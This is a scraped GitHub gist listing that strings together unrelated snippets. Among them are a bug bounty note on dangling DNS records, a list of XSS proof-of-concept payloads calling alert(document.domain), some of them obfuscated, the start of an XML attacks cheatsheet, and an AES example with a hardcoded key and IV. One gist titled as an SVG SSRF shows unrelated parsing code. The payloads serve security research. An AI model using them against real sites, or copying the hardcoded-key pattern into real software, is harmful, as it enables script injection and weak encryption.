rainb3rry

  • Istanbul
@TheBinitGhimire
TheBinitGhimire / README.md
Last active August 26, 2023 12:39
[Facebook Bug Bounty] Dangling DNS Records on surf-test.xwf.internet.org! - $500

Dangling DNS Records on surf-test.xwf.internet.org! - $500

Read the proper write-up here: https://publish.whoisbinit.me/amazon-ec2-dangling-dns-records-on-surf-test-xwf-internet-org!

Vulnerability Discovery

In this GitHub Gist, I have included my script (main.sh), which I used in discovering this vulnerability.

The script performs sub-domain enumeration over the Internet.org domain using assetfinder, subfinder, sublist3r and amass, and then checks for sub-domains which are further pointing to Amazon EC2 hostnames, and stores all of the results in multiple text files.

I didn't perform any form of manual work in discovering this vulnerability, and my workflow was fully automated with the help of Bash scripting using different tools.

@berkorbay
berkorbay / github_desktop_ubuntu.md
Last active April 25, 2024 01:56
To install Github Desktop for Ubuntu

IMPORTANT

See the following links for further updates to Github Desktop for Ubuntu. These are official instructions. (also mentioned by fetwar on Nov 3, 2023)

For the sake of "maintaining the tradition" here is the updated version.

@akhil-reni
akhil-reni / ssrf_iframe.svg
Created April 4, 2019 11:17
SVG Foreign Objects IFrame SSRF
// unserialize.js v1.0.1
// Parse a URL-encoded string ("a=1&b=2") into a plain object.
function unserialize(serialize) {
  const obj = {};
  const pairs = serialize.split('&');
  for (let i = 0; i < pairs.length; i++) {
    // Declared locally; the original assigned to an implicit global.
    const thisItem = pairs[i].split('=');
    obj[decodeURIComponent(thisItem[0])] = decodeURIComponent(thisItem[1]);
  }
  return obj;
}
@tomnomnom
tomnomnom / alert.js
Last active April 23, 2024 20:42
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@sidneys
sidneys / youtube_format_code_itag_list.md
Created January 20, 2018 11:12
YouTube video stream format codes itags

YouTube video stream format codes

Comprehensive list of YouTube format code itags

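| itag Code | Container | Content | Resolution | Bitrate | Range | VR / 3D |
|---|---|---|---|---|---|---|
| 5 | flv | audio/video | 240p | - | - | - |
| 6 | flv | audio/video | 270p | - | - | - |
| 17 | 3gp | audio/video | 144p | - | - | - |
| 18 | mp4 | audio/video | 360p | - | - | - |
| 22 | mp4 | audio/video | 720p | - | - | - |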
@siwalikm
siwalikm / aes-256-cbc.js
Last active April 19, 2024 21:03
AES-256-CBC implementation in nodeJS with built-in Crypto library
'use strict';
const crypto = require('crypto');
const ENC_KEY = "bf3c199c2470cb477d907b1e0917c17b"; // set random encryption key
const IV = "5183666c72eec9e4"; // set random initialisation vector
// ENC_KEY and IV can be generated as crypto.randomBytes(32).toString('hex');
const phrase = "who let the dogs out";
var encrypt = ((val) => {
@Biostate
Biostate / iller.js
Created December 8, 2017 18:39
Turkey provinces and districts Array
var iller = {
"Ankara": ["Altındağ", "Ayaş", "Bala", "Beypazarı", "Çamlıdere", "Çankaya", "Çubuk", "Etimesgut", "Haymana", "Kalecik", "Keçiören", "Kızılcahamam", "Mamak", "Nallıhan", "Polatlı", "Şereflikoçhisar", "Sincan", "Yenimahalle"],
"İstanbul": ["Adalar", "Bağcılar", "Bahçelievler", "Bakırköy", "Beşiktaş", "Beykoz", "Beyoğlu", "Büyükçekmece", "Çatalca", "Eminönü", "Esenler", "Eyüp", "Fatih", "Gaziosmanpaşa", "Güngören", "Kadıköy", "Kağıthane", "Kartal", "Küçükçekmece", "Maltepe", "Pendik", "Sarıyer", "Silivri", "Şile", "Şişli", "Sultanbeyli", "Tuzla", "Ümraniye", "Üsküdar", "Zeytinburnu"],
"İzmir": ["Aliağa", "Balçova", "Bayındır", "Bergama", "Beydağ", "Bornova", "Buca", "Çeşme", "Dikili", "Foça", "Güzelbahçe", "Karaburun", "Karşıyaka", "Kemalpaşa", "Kınık", "Kiraz", "Konak", "Menderes", "Menemen", "Narlıdere", "Ödemiş", "Seferihisar", "Selçuk", "Tire", "Torbalı", "Urla"],
"Adana": ["Aladağ", "Ceyhan", "Feke", "Karaisalı", "Kozan", "Pozantı", "Saimbeyli", "Seyhan", "Yumurtalı", "Yüreğir"
@mgeeky
mgeeky / xml-attacks.md
Last active April 13, 2024 15:52
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may not be secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

A penetration tester running XML tests against an application will have to determine which XML parser is in use, and then which of the attacks listed below that parser is vulnerable to.


@HassenIO
HassenIO / sha256.sh
Last active January 21, 2022 10:27
Get SHA256 of a text in Mac OSX terminal
# Get SHA256 of a text
# Usage: sha256 password
# output: 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
function sha256() {
  # Quote the argument and use printf so text containing spaces or a leading dash is hashed as given
  printf '%s' "$1" | shasum -a 256
  # Source: http://albertech.blogspot.fr/2015/02/generate-sha-256-hash-from-command-line.html
}